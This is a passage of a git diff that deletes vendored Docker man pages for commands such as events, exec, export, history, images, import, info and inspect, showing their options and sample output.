-   Show all events created since timestamp
-
-**--until**=""
-   Stream events until this timestamp
-
-**--format**=""
-   Format the output using the given Go template
-
-The `--since` and `--until` parameters can be Unix timestamps, date formatted
-timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed
-relative to the client machine's time. If you do not provide the `--since` option,
-the command returns only new and/or live events.  Supported formats for date
-formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`,
-`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local
-timezone on the client will be used if you do not provide either a `Z` or a
-`+-00:00` timezone offset at the end of the timestamp.  When providing Unix
-timestamps enter seconds[.nanoseconds], where seconds is the number of seconds
-that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap
-seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a
-fraction of a second no more than nine digits long.
-
-# EXAMPLES
-
-## Listening for Docker events
-
-After running docker events a container 786d698004576 is started and stopped
-(The container name has been shortened in the output below):
-
-    # docker events
-    2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) start
-    2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) die
-    2015-01-28T20:21:32.000000000-08:00 59211849bc10: (from whenry/testimage:latest) stop
-
-## Listening for events since a given date
-Again the output container IDs have been shortened for the purposes of this document:
-
-    # docker events --since '2015-01-28'
-    2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create
-    2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start
-    2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create
-    2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start
-    2015-01-28T20:25:40.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die
-    2015-01-28T20:25:42.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop
-    2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start
-    2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die
-    2015-01-28T20:25:46.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop
-
-The following example outputs all events that were generated in the last 3 minutes,
-relative to the current time on the client machine:
-
-    # docker events --since '3m'
-    2015-05-12T11:51:30.999999999Z07:00  4386fb97867d: (from ubuntu-1:14.04) die
-    2015-05-12T15:52:12.999999999Z07:00  4386fb97867d: (from ubuntu-1:14.04) stop
-    2015-05-12T15:53:45.999999999Z07:00  7805c1d35632: (from redis:2.8) die
-    2015-05-12T15:54:03.999999999Z07:00  7805c1d35632: (from redis:2.8) stop
-
-If you do not provide the --since option, the command returns only new and/or
-live events.
-
-## Format
-
-If a format (`--format`) is specified, the given template will be executed
-instead of the default format. Go's **text/template** package describes all the
-details of the format.
-
-    # docker events --filter 'type=container' --format 'Type={{.Type}}  Status={{.Status}}  ID={{.ID}}'
-    Type=container  Status=create  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-    Type=container  Status=attach  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-    Type=container  Status=start  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-    Type=container  Status=resize  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-    Type=container  Status=die  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-    Type=container  Status=destroy  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-
-If a format is set to `{{json .}}`, the events are streamed as valid JSON
-Lines. For information about JSON Lines, please refer to http://jsonlines.org/ .
-
-    # docker events --format '{{json .}}'
-    {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
-    {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
-    {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e..
-    {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42..
-    {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
-
-## Filters
-
-    $ docker events --filter 'event=stop'
-    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-    2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-    $ docker events --filter 'image=ubuntu-1:14.04'
-    2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04)
-    2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
-    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-
-    $ docker events --filter 'container=7805c1d35632'
-    2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
-    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8)
-
-    $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d'
-    2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
-    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-    2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
-    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-    $ docker events --filter 'container=7805c1d35632' --filter 'event=stop'
-    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-    $ docker events --filter 'type=volume'
-    2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local)
-    2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate)
-    2015-12-23T21:05:28.650314265Z volume unmount test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local)
-    2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local)
-
-    $ docker events --filter 'type=network'
-    2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge)
-    2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge)
-
-    $ docker events --filter 'type=plugin' (experimental)
-    2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest)
-    2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest)
-
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-June 2015, updated by Brian Goff <cpuguy83@gmail.com>
-October 2015, updated by Mike Brown <mikebrow@gmail.com>
diff --git a/vendor/github.com/docker/docker/man/docker-exec.1.md b/vendor/github.com/docker/docker/man/docker-exec.1.md
deleted file mode 100644
index fe9c279e7e..0000000000
--- a/vendor/github.com/docker/docker/man/docker-exec.1.md
+++ /dev/null
@@ -1,71 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-exec - Run a command in a running container
-
-# SYNOPSIS
-**docker exec**
-[**-d**|**--detach**]
-[**--detach-keys**[=*[]*]]
-[**-e**|**--env**[=*[]*]]
-[**--help**]
-[**-i**|**--interactive**]
-[**--privileged**]
-[**-t**|**--tty**]
-[**-u**|**--user**[=*USER*]]
-CONTAINER COMMAND [ARG...]
-
-# DESCRIPTION
-
-Run a process in a running container.
-
-The command started using `docker exec` will only run while the container's primary
-process (`PID 1`) is running, and will not be restarted if the container is restarted.
-
-If the container is paused, then the `docker exec` command will wait until the
-container is unpaused, and then run
-
-# OPTIONS
-**-d**, **--detach**=*true*|*false*
-   Detached mode: run command in the background. The default is *false*.
-
-**--detach-keys**=""
-  Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
-
-**-e**, **--env**=[]
-   Set environment variables
-
-   This option allows you to specify arbitrary environment variables that are
-available for the command to be executed.
-
-**--help**
-  Print usage statement
-
-**-i**, **--interactive**=*true*|*false*
-   Keep STDIN open even if not attached. The default is *false*.
-
-**--privileged**=*true*|*false*
-   Give the process extended [Linux capabilities](http://man7.org/linux/man-pages/man7/capabilities.7.html)
-when running in a container. The default is *false*.
-
-   Without this flag, the process run by `docker exec` in a running container has
-the same capabilities as the container, which may be limited. Set
-`--privileged` to give all capabilities to the process.
-
-**-t**, **--tty**=*true*|*false*
-   Allocate a pseudo-TTY. The default is *false*.
-
-**-u**, **--user**=""
-   Sets the username or UID used and optionally the groupname or GID for the specified command.
-
-   The followings examples are all valid:
-   --user [user | user:group | uid | uid:gid | user:gid | uid:group ]
-
-   Without this argument the command will be run as root in the container.
-
-The **-t** option is incompatible with a redirection of the docker client
-standard input.
-
-# HISTORY
-November 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-export.1.md b/vendor/github.com/docker/docker/man/docker-export.1.md
deleted file mode 100644
index 3d59e4788e..0000000000
--- a/vendor/github.com/docker/docker/man/docker-export.1.md
+++ /dev/null
@@ -1,46 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-export - Export the contents of a container's filesystem as a tar archive
-
-# SYNOPSIS
-**docker export**
-[**--help**]
-[**-o**|**--output**[=*""*]]
-CONTAINER
-
-# DESCRIPTION
-Export the contents of a container's filesystem using the full or shortened
-container ID or container name. The output is exported to STDOUT and can be
-redirected to a tar file.
-
-Stream to a file instead of STDOUT by using **-o**.
-
-# OPTIONS
-**--help**
-  Print usage statement
-  
-**-o**, **--output**=""
-  Write to a file, instead of STDOUT
-
-# EXAMPLES
-Export the contents of the container called angry_bell to a tar file
-called angry_bell.tar:
-
-    # docker export angry_bell > angry_bell.tar
-    # docker export --output=angry_bell-latest.tar angry_bell
-    # ls -sh angry_bell.tar
-    321M angry_bell.tar
-    # ls -sh angry_bell-latest.tar
-    321M angry_bell-latest.tar
-
-# See also
-**docker-import(1)** to create an empty filesystem image
-and import the contents of the tarball into it, then optionally tag it.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-January 2015, updated by Joseph Kern (josephakern at gmail dot com)
diff --git a/vendor/github.com/docker/docker/man/docker-history.1.md b/vendor/github.com/docker/docker/man/docker-history.1.md
deleted file mode 100644
index 91edefe25f..0000000000
--- a/vendor/github.com/docker/docker/man/docker-history.1.md
+++ /dev/null
@@ -1,52 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-history - Show the history of an image
-
-# SYNOPSIS
-**docker history**
-[**--help**]
-[**-H**|**--human**[=*true*]]
-[**--no-trunc**]
-[**-q**|**--quiet**]
-IMAGE
-
-# DESCRIPTION
-
-Show the history of when and how an image was created.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**-H**, **--human**=*true*|*false*
-    Print sizes and dates in human readable format. The default is *true*.
-
-**--no-trunc**=*true*|*false*
-   Don't truncate output. The default is *false*.
-
-**-q**, **--quiet**=*true*|*false*
-   Only show numeric IDs. The default is *false*.
-
-# EXAMPLES
-    $ docker history fedora
-    IMAGE          CREATED          CREATED BY                                      SIZE                COMMENT
-    105182bb5e8b   5 days ago       /bin/sh -c #(nop) ADD file:71356d2ad59aa3119d   372.7 MB
-    73bd853d2ea5   13 days ago      /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar   0 B
-    511136ea3c5a   10 months ago                                                    0 B                 Imported from -
-
-## Display comments in the image history
-The `docker commit` command has a **-m** flag for adding comments to the image. These comments will be displayed in the image history.
-
-    $ sudo docker history docker:scm
-    IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
-    2ac9d1098bf1        3 months ago        /bin/bash                                       241.4 MB            Added Apache to Fedora base image
-    88b42ffd1f7c        5 months ago        /bin/sh -c #(nop) ADD file:1fd8d7f9f6557cafc7   373.7 MB            
-    c69cab00d6ef        5 months ago        /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar   0 B                 
-    511136ea3c5a        19 months ago                                                       0 B                 Imported from -
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-images.1.md b/vendor/github.com/docker/docker/man/docker-images.1.md
deleted file mode 100644
index d7958d0dc4..0000000000
--- a/vendor/github.com/docker/docker/man/docker-images.1.md
+++ /dev/null
@@ -1,153 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-images - List images
-
-# SYNOPSIS
-**docker images**
-[**--help**]
-[**-a**|**--all**]
-[**--digests**]
-[**-f**|**--filter**[=*[]*]]
-[**--format**=*"TEMPLATE"*]
-[**--no-trunc**]
-[**-q**|**--quiet**]
-[REPOSITORY[:TAG]]
-
-# DESCRIPTION
-This command lists the images stored in the local Docker repository.
-
-By default, intermediate images, used during builds, are not listed. Some of the
-output, e.g., image ID, is truncated, for space reasons. However the truncated
-image ID, and often the first few characters, are enough to be used in other
-Docker commands that use the image ID. The output includes repository, tag, image
-ID, date created and the virtual size.
-
-The title REPOSITORY for the first title may seem confusing. It is essentially
-the image name. However, because you can tag a specific image, and multiple tags
-(image instances) can be associated with a single name, the name is really a
-repository for all tagged images of the same name. For example consider an image
-called fedora. It may be tagged with 18, 19, or 20, etc. to manage different
-versions.
-
-# OPTIONS
-**-a**, **--all**=*true*|*false*
-   Show all images (by default filter out the intermediate image layers). The default is *false*.
-
-**--digests**=*true*|*false*
-   Show image digests. The default is *false*.
-
-**-f**, **--filter**=[]
-   Filters the output based on these conditions:
-   - dangling=(true|false) - find unused images
-   - label=<key> or label=<key>=<value>
-   - before=(<image-name>[:tag]|<image-id>|<image@digest>)
-   - since=(<image-name>[:tag]|<image-id>|<image@digest>)
-
-**--format**="*TEMPLATE*"
-   Pretty-print images using a Go template.
-   Valid placeholders:
-      .ID - Image ID
-      .Repository - Image repository
-      .Tag - Image tag
-      .Digest - Image digest
-      .CreatedSince - Elapsed time since the image was created
-      .CreatedAt - Time when the image was created
-      .Size - Image disk size
-
-**--help**
-  Print usage statement
-
-**--no-trunc**=*true*|*false*
-   Don't truncate output. The default is *false*.
-
-**-q**, **--quiet**=*true*|*false*
-   Only show numeric IDs. The default is *false*.
-
-# EXAMPLES
-
-## Listing the images
-
-To list the images in a local repository (not the registry) run:
-
-    docker images
-
-The list will contain the image repository name, a tag for the image, and an
-image ID, when it was created and its virtual size. Columns: REPOSITORY, TAG,
-IMAGE ID, CREATED, and SIZE.
-
-The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument
-that restricts the list to images that match the argument. If you specify
-`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the
-given repository.
-
-    docker images java
-
-The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example,
-`docker images jav` does not match the image `java`.
-
-If both `REPOSITORY` and `TAG` are provided, only images matching that
-repository and tag are listed.  To find all local images in the "java"
-repository with tag "8" you can use:
-
-    docker images java:8
-
-To get a verbose list of images which contains all the intermediate images
-used in builds use **-a**:
-
-    docker images -a
-
-Previously, the docker images command supported the --tree and --dot arguments,
-which displayed different visualizations of the image data. Docker core removed
-this functionality in the 1.7 version. If you liked this functionality, you can
-still find it in the third-party dockviz tool: https://github.com/justone/dockviz.
-
-## Listing images in a desired format
-
-When using the --format option, the image command will either output the data 
-exactly as the template declares or, when using the `table` directive, will 
-include column headers as well. You can use special characters like `\t` for
-inserting tab spacing between columns. 
-
-The following example uses a template without headers and outputs the ID and 
-Repository entries separated by a colon for all images:
-
-    docker images --format "{{.ID}}: {{.Repository}}"
-    77af4d6b9913: <none>
-    b6fa739cedf5: committ
-    78a85c484bad: ipbabble
-    30557a29d5ab: docker
-    5ed6274db6ce: <none>
-    746b819f315e: postgres
-    746b819f315e: postgres
-    746b819f315e: postgres
-    746b819f315e: postgres
-
-To list all images with their repository and tag in a table format you can use:
-
-    docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}"
-    IMAGE ID            REPOSITORY                TAG
-    77af4d6b9913        <none>                    <none>
-    b6fa739cedf5        committ                   latest
-    78a85c484bad        ipbabble                  <none>
-    30557a29d5ab        docker                    latest
-    5ed6274db6ce        <none>                    <none>
-    746b819f315e        postgres                  9
-    746b819f315e        postgres                  9.3
-    746b819f315e        postgres                  9.3.5
-    746b819f315e        postgres                  latest
-
-Valid template placeholders are listed above.
-
-## Listing only the shortened image IDs
-
-Listing just the shortened image IDs. This can be useful for some automated
-tools.
-
-    docker images -q
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-import.1.md b/vendor/github.com/docker/docker/man/docker-import.1.md
deleted file mode 100644
index 43d65efe6a..0000000000
--- a/vendor/github.com/docker/docker/man/docker-import.1.md
+++ /dev/null
@@ -1,72 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-import - Create an empty filesystem image and import the contents of the tarball (.tar, .tar.gz, .tgz, .bzip, .tar.xz, .txz) into it, then optionally tag it.
-
-# SYNOPSIS
-**docker import**
-[**-c**|**--change**[=*[]*]]
-[**-m**|**--message**[=*MESSAGE*]]
-[**--help**]
-file|URL|**-**[REPOSITORY[:TAG]]
-
-# OPTIONS
-**-c**, **--change**=[]
-   Apply specified Dockerfile instructions while importing the image
-   Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR`
-
-**--help**
-  Print usage statement
-
-**-m**, **--message**=""
-   Set commit message for imported image
-
-# DESCRIPTION
-Create a new filesystem image from the contents of a tarball (`.tar`,
-`.tar.gz`, `.tgz`, `.bzip`, `.tar.xz`, `.txz`) into it, then optionally tag it.
-
-
-# EXAMPLES
-
-## Import from a remote location
-
-    # docker import http://example.com/exampleimage.tgz example/imagerepo
-
-## Import from a local file
-
-Import to docker via pipe and stdin:
-
-    # cat exampleimage.tgz | docker import - example/imagelocal
-
-Import with a commit message. 
-
-    # cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new
-
-Import to a Docker image from a local file.
-
-    # docker import /path/to/exampleimage.tgz 
-
-
-## Import from a local file and tag
-
-Import to docker via pipe and stdin:
-
-    # cat exampleimageV2.tgz | docker import - example/imagelocal:V-2.0
-
-## Import from a local directory
-
-    # tar -c . | docker import - exampleimagedir
-
-## Apply specified Dockerfile instructions while importing the image
-This example sets the docker image ENV variable DEBUG to true by default.
-
-    # tar -c . | docker import -c="ENV DEBUG true" - exampleimagedir
-
-# See also
-**docker-export(1)** to export the contents of a filesystem as a tar archive to STDOUT.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-info.1.md b/vendor/github.com/docker/docker/man/docker-info.1.md
deleted file mode 100644
index bb7a8fb4c2..0000000000
--- a/vendor/github.com/docker/docker/man/docker-info.1.md
+++ /dev/null
@@ -1,187 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-info - Display system-wide information
-
-# SYNOPSIS
-**docker info**
-[**--help**]
-[**-f**|**--format**[=*FORMAT*]]
-
-# DESCRIPTION
-This command displays system wide information regarding the Docker installation.
-Information displayed includes the kernel version, number of containers and images.
-The number of images shown is the number of unique images. The same image tagged
-under different names is counted only once.
-
-If a format is specified, the given template will be executed instead of the
-default format. Go's **text/template** package
-describes all the details of the format.
-
-Depending on the storage driver in use, additional information can be shown, such
-as pool name, data file, metadata file, data space used, total data space, metadata
-space used, and total metadata space.
-
-The data file is where the images are stored and the metadata file is where the
-meta data regarding those images are stored. When run for the first time Docker
-allocates a certain amount of data space and meta data space from the space
-available on the volume where `/var/lib/docker` is mounted.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**-f**, **--format**=""
-  Format the output using the given Go template
-
-# EXAMPLES
-
-## Display Docker system information
-
-Here is a sample output for a daemon running on Ubuntu, using the overlay2
-storage driver:
-
-    $ docker -D info
-    Containers: 14
-     Running: 3
-     Paused: 1
-     Stopped: 10
-    Images: 52
-    Server Version: 1.13.0
-    Storage Driver: overlay2
-     Backing Filesystem: extfs
-     Supports d_type: true
-     Native Overlay Diff: false
-    Logging Driver: json-file
-    Cgroup Driver: cgroupfs
-    Plugins:
-     Volume: local
-     Network: bridge host macvlan null overlay
-    Swarm: active
-     NodeID: rdjq45w1op418waxlairloqbm
-     Is Manager: true
-     ClusterID: te8kdyw33n36fqiz74bfjeixd
-     Managers: 1
-     Nodes: 2
-     Orchestration:
-      Task History Retention Limit: 5
-     Raft:
-      Snapshot Interval: 10000
-      Number of Old Snapshots to Retain: 0
-      Heartbeat Tick: 1
-      Election Tick: 3
-     Dispatcher:
-      Heartbeat Period: 5 seconds
-     CA Configuration:
-      Expiry Duration: 3 months
-     Node Address: 172.16.66.128 172.16.66.129
-     Manager Addresses:
-      172.16.66.128:2477
-    Runtimes: runc
-    Default Runtime: runc
-    Init Binary: docker-init
-    containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531
-    runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2
-    init version: N/A (expected: v0.13.0)
-    Security Options:
-     apparmor
-     seccomp
-      Profile: default
-    Kernel Version: 4.4.0-31-generic
-    Operating System: Ubuntu 16.04.1 LTS
-    OSType: linux
-    Architecture: x86_64
-    CPUs: 2
-    Total Memory: 1.937 GiB
-    Name: ubuntu
-    ID: H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326
-    Docker Root Dir: /var/lib/docker
-    Debug Mode (client): true
-    Debug Mode (server): true
-     File Descriptors: 30
-     Goroutines: 123
-     System Time: 2016-11-12T17:24:37.955404361-08:00
-     EventsListeners: 0
-    Http Proxy: http://test:test@proxy.example.com:8080
-    Https Proxy: https://test:test@proxy.example.com:8080
-    No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com
-    Registry: https://index.docker.io/v1/
-    WARNING: No swap limit support
-    Labels:
-     storage=ssd
-     staging=true
-    Experimental: false
-    Insecure Registries:
-     127.0.0.0/8
-    Registry Mirrors:
-      http://192.168.1.2/
-      http://registry-mirror.example.com:5000/
-    Live Restore Enabled: false
-
-
-
-The global `-D` option tells all `docker` commands to output debug information.
-
-The example below shows the output for a daemon running on Red Hat Enterprise Linux,
-using the devicemapper storage driver. As can be seen in the output, additional
-information about the devicemapper storage driver is shown:
-
-    $ docker info
-    Containers: 14
-     Running: 3
-     Paused: 1
-     Stopped: 10
-    Untagged Images: 52
-    Server Version: 1.10.3
-    Storage Driver: devicemapper
-     Pool Name: docker-202:2-25583803-pool
-     Pool Blocksize: 65.54 kB
-     Base Device Size: 10.74 GB
-     Backing Filesystem: xfs
-     Data file: /dev/loop0
-     Metadata file: /dev/loop1
-     Data Space Used: 1.68 GB
-     Data Space Total: 107.4 GB
-     Data Space Available: 7.548 GB
-     Metadata Space Used: 2.322 MB
-     Metadata Space Total: 2.147 GB
-     Metadata Space Available: 2.145 GB
-     Udev Sync Supported: true
-     Deferred Removal Enabled: false
-     Deferred Deletion Enabled: false
-     Deferred Deleted Device Count: 0
-     Data loop file: /var/lib/docker/devicemapper/devicemapper/data
-     Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata
-     Library Version: 1.02.107-RHEL7 (2015-12-01)
-    Execution Driver: native-0.2
-    Logging Driver: json-file
-    Plugins:
-     Volume: local
-     Network: null host bridge
-    Kernel Version: 3.10.0-327.el7.x86_64
-    Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo)
-    OSType: linux
-    Architecture: x86_64
-    CPUs: 1
-    Total Memory: 991.7 MiB
-    Name: ip-172-30-0-91.ec2.internal
-    ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S
-    Docker Root Dir: /var/lib/docker
-    Debug mode (client): false
-    Debug mode (server): false
-    Username: gordontheturtle
-    Registry: https://index.docker.io/v1/
-    Insecure registries:
-     myinsecurehost:5000
-     127.0.0.0/8
-
-You can also specify the output format:
-
-    $ docker info --format '{{json .}}'
-	{"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...}
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-inspect.1.md b/vendor/github.com/docker/docker/man/docker-inspect.1.md
deleted file mode 100644
index 21d7ba678a..0000000000
--- a/vendor/github.com/docker/docker/man/docker-inspect.1.md
+++ /dev/null
@@ -1,323 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-inspect - Return low-level information on docker objects
-
-# SYNOPSIS
-**docker inspect**
-[**--help**]
-[**-f**|**--format**[=*FORMAT*]]
-[**-s**|**--size**]
-[**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume*]
-NAME|ID [NAME|ID...]
-
-# DESCRIPTION
-
-This displays the low-level information on Docker object(s) (e.g. container, 
-image, volume,network, node, service, or task) identified by name or ID. By default,
-this will render all results in a JSON array. If the container and image have
-the same name, this will return container JSON for unspecified type. If a format
-is specified, the given template will be executed for each result.
-
-# OPTIONS
-**--help**
-    Print usage statement
-
-**-f**, **--format**=""
-    Format the output using the given Go template
-
-**-s**, **--size**
-    Display total file sizes if the type is container
-
-**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume*
-    Return JSON for specified type, permissible values are "image", "container",
-    "network", "node", "service", "task", and "volume"
-
-# EXAMPLES
-
-Get information about an image when image name conflicts with the container name,
-e.g. both image and container are named rhel7:
-
-    $ docker inspect --type=image rhel7
-    [
-    {
-     "Id": "fe01a428b9d9de35d29531e9994157978e8c48fa693e1bf1d221dffbbb67b170",
-     "Parent": "10acc31def5d6f249b548e01e8ffbaccfd61af0240c17315a7ad393d022c5ca2",
-     ....
-    }
-    ]
-
-## Getting information on a container
-
-To get information on a container use its ID or instance name:
-
-    $ docker inspect d2cc496561d6
-    [{
-    "Id": "d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47",
-    "Created": "2015-06-08T16:18:02.505155285Z",
-    "Path": "bash",
-    "Args": [],
-    "State": {
-        "Running": false,
-        "Paused": false,
-        "Restarting": false,
-        "OOMKilled": false,
-        "Dead": false,
-        "Pid": 0,
-        "ExitCode": 0,
-        "Error": "",
-        "StartedAt": "2015-06-08T16:18:03.643865954Z",
-        "FinishedAt": "2015-06-08T16:57:06.448552862Z"
-    },
-    "Image": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4",
-    "NetworkSettings": {
-        "Bridge": "",
-        "SandboxID": "6b4851d1903e16dd6a567bd526553a86664361f31036eaaa2f8454d6f4611f6f",
-        "HairpinMode": false,
-        "LinkLocalIPv6Address": "",
-        "LinkLocalIPv6PrefixLen": 0,
-        "Ports": {},
-        "SandboxKey": "/var/run/docker/netns/6b4851d1903e",
-        "SecondaryIPAddresses": null,
-        "SecondaryIPv6Addresses": null,
-        "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d",
-        "Gateway": "172.17.0.1",
-        "GlobalIPv6Address": "",
-        "GlobalIPv6PrefixLen": 0,
-        "IPAddress": "172.17.0.2",
-        "IPPrefixLen": 16,
-        "IPv6Gateway": "",
-        "MacAddress": "02:42:ac:12:00:02",
-        "Networks": {
-            "bridge": {
-                "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
-                "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d",
-                "Gateway": "172.17.0.1",
-                "IPAddress": "172.17.0.2",
-                "IPPrefixLen": 16,
-                "IPv6Gateway": "",
-                "GlobalIPv6Address": "",
-                "GlobalIPv6PrefixLen": 0,
-                "MacAddress": "02:42:ac:12:00:02"
-            }
-        }
-
-    },
-    "ResolvConfPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/resolv.conf",
-    "HostnamePath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hostname",
